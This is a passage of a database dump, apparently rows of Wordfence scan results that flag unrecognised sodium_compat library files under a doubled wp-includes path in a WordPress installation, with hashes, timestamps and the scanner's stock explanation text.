noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/sodium_compat/composer.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27577,1631424943,1631424943,'new','knownfile',75,'2b1c7c7d90b732bcb2d8c0a31223c4fc','b41f72416cde1cdcb90176b776b9302f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/lib/constants.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/sodium_compat/lib/constants.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27578,1631424943,1631424943,'new','knownfile',75,'25f103eaf2287f708819317590d2e4ad','5ca1d1b9602685d01e5e69289b1a1f1e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/lib/namespaced.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/sodium_compat/lib/namespaced.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27579,1631424944,1631424944,'new','knownfile',75,'967f990d59f951319584be1bdce983ef','8da9a3b0e256b89aa70c6533e7d34933','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/lib/php72compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/sodium_compat/lib/php72compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27580,1631424944,1631424944,'new','knownfile',75,'4ff9d7ff1cee269750a6e0b34584073c','82513fc15669e025a87d2f6b290d8fb3','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/lib/php72compat_const.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sodium_compat/lib/php72compat_const.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27581,1631424944,1631424944,'new','knownfile',75,'7ee178af2f72bd98c6e6ce4ef83bca93','5e5efd267692876d21ba1542165feede','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/lib/sodium_compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/lib/sodium_compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27582,1631424944,1631424944,'new','knownfile',75,'c8fad0aab103c67217d886163e7d4d20','beb21866e15767135aa721f6b7958fbf','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/namespaced/Compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27583,1631424944,1631424944,'new','knownfile',75,'1289fcca6cef4405f0a0cbdffb8e351e','35628eb2e44ea173d3a489e570c53c90','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27584,1631424944,1631424944,'new','knownfile',75,'a05ac6525392c24f7fd20b83a346a43d','0a04567d9e8892eb026ba52f574cbe8e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27585,1631424944,1631424944,'new','knownfile',75,'c0177948159e5d3f07c153de37e926cd','8e22e661b7cf85317116f2b5bb16c814','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27586,1631424944,1631424944,'new','knownfile',75,'a728c2603102d4da1ad63ad08b8f6336','81df55e19de771268031de5f3e01cdca','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27587,1631424944,1631424944,'new','knownfile',75,'bf66b69f59ce1a3190e63e5765f209ed','42bb56818e051c90a635c649e364a532','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27588,1631424944,1631424944,'new','knownfile',75,'c823afa1da0a28262e3a979571cd1795','83e7b738e6a82f42ede2fde919e75812','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27589,1631424944,1631424944,'new','knownfile',75,'f87fae08f2f4ac5eb1939b7b41868f55','05beff85dceee43c87bd025606eaa890','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27590,1631424944,1631424944,'new','knownfile',75,'d5e852ca329c155ba27e73e6c7bba7a6','01ae593eec16cefc33cca602c4fbfd0c','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27591,1631424944,1631424944,'new','knownfile',75,'57080d4b5d8a3a83e5276851787184d4','799d5cd1d949f202164d4e4621e0c2ca','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27592,1631424944,1631424944,'new','knownfile',75,'d04dcb163b46892f990ac7e31a89873f','7219164d5bffc684941abc65be5f3aa1','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:79:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27593,1631424944,1631424944,'new','knownfile',75,'a200da728e9b954b75bfd5ac3a2f5852','91ef5aa67f8ce4dec95bfe4e2d3177d8','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27594,1631424944,1631424944,'new','knownfile',75,'37e94cb3e502edc7d027a0887007de60','dc2cbb12ee115fcdca4e8ba42d70acf5','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:68:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27595,1631424944,1631424944,'new','knownfile',75,'f1b5f69ddb81b6410a3818f85a69b27c','ad7f47840c2eb6e55d4c381155b279ee','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Ed25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Ed25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27596,1631424944,1631424944,'new','knownfile',75,'eae16686a61263e83885574f076bbf82','12c0b3cbc74f259d0d2e5183faf702ed','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27597,1631424945,1631424945,'new','knownfile',75,'e04be688c74cb46a3281d561dc858c07','d024b274fa9778bfd561eeded8589c85','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27598,1631424945,1631424945,'new','knownfile',75,'652ac51b364d6cabac2e240aceba50ea','b484338942b7784e1d2eed887f3dc127','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27599,1631424945,1631424945,'new','knownfile',75,'6d5bd1790bf116123e80b953304dd48f','0031cf7490b9fc13330152bc1f44fe3c','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27600,1631424945,1631424945,'new','knownfile',75,'98008eed508913223ca3a844e5636a46','2e8702e10f2fbc61d6035d1a56fa9466','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Salsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Salsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27601,1631424946,1631424946,'new','knownfile',75,'2f6f4565c233ec04b240a65b6e333555','2982e8ff55ea87813c59c83e1165c150','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/SipHash.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/SipHash.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27602,1631424946,1631424946,'new','knownfile',75,'278d5d68a2acc2cf39f511c8cfe13f47','0f1eb6123ba7334412ebe03ac6a24093','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Util.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Util.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27603,1631424946,1631424946,'new','knownfile',75,'b8c0fa856b4de51d3f192d6893cd9d1e','4a6a8adbcac1aad4f34ac9788e9a97a8','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/X25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/X25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27604,1631424946,1631424946,'new','knownfile',75,'40b08879462383faf8bd88f0a7416155','e2b7a75a71f2fa73299e5034c83a7072','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27605,1631424946,1631424946,'new','knownfile',75,'49667306b8a79a4581aa8c513c9a7bc0','baad78c4c1c51a1cd8cd076702802632','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27606,1631424946,1631424946,'new','knownfile',75,'118245a93dcdb367b179cf77f8bb2ef6','d2c45c965bcfbe2288496dd48156428f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Crypto.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/namespaced/Crypto.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27607,1631424946,1631424946,'new','knownfile',75,'4a7b7455185d94da5938b6debe855ce8','4ddfb1ef8825a1198a5efa1ba6c18bf1','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/File.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/sodium_compat/namespaced/File.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27608,1631424946,1631424946,'new','knownfile',75,'25056205a844ea5b8c193969998870cf','31500418ddfd59bcf9c56a9ff07d1760','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/sodium_compat/src/Compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27609,1631424946,1631424946,'new','knownfile',75,'d9ba263d402bd8281782f26189f241be','5959516176a2a9877e9a63a76eb9a30f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/BLAKE2b.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core/BLAKE2b.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27610,1631424946,1631424946,'new','knownfile',75,'56cc6cc02c7e3e57f028136b77c14ec8','885b85acca28bb9f73c42e8701a26634','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Base64/Common.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/sodium_compat/src/Core/Base64/Common.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27611,1631424946,1631424946,'new','knownfile',75,'5ba40268ce12ca7dc00dd16be7da6eb0','4d0b91f94f61b77735becafa967ba975','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Base64/Original.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/src/Core/Base64/Original.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27612,1631424946,1631424946,'new','knownfile',75,'d79712436017fbbb705d5dcb49f02ab6','bd55d3b90961a8f5fffe26481fdc4653','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27613,1631424946,1631424946,'new','knownfile',75,'59f299dbebe00f224382a0d1d297c861','57ea9233a333f1aed783c046d7aad5f2','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27614,1631424946,1631424946,'new','knownfile',75,'2efa6f9ab33fb430f1750fc82ff6fab4','d20b3e6e69af7dfa6fbd3223b9e8a320','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 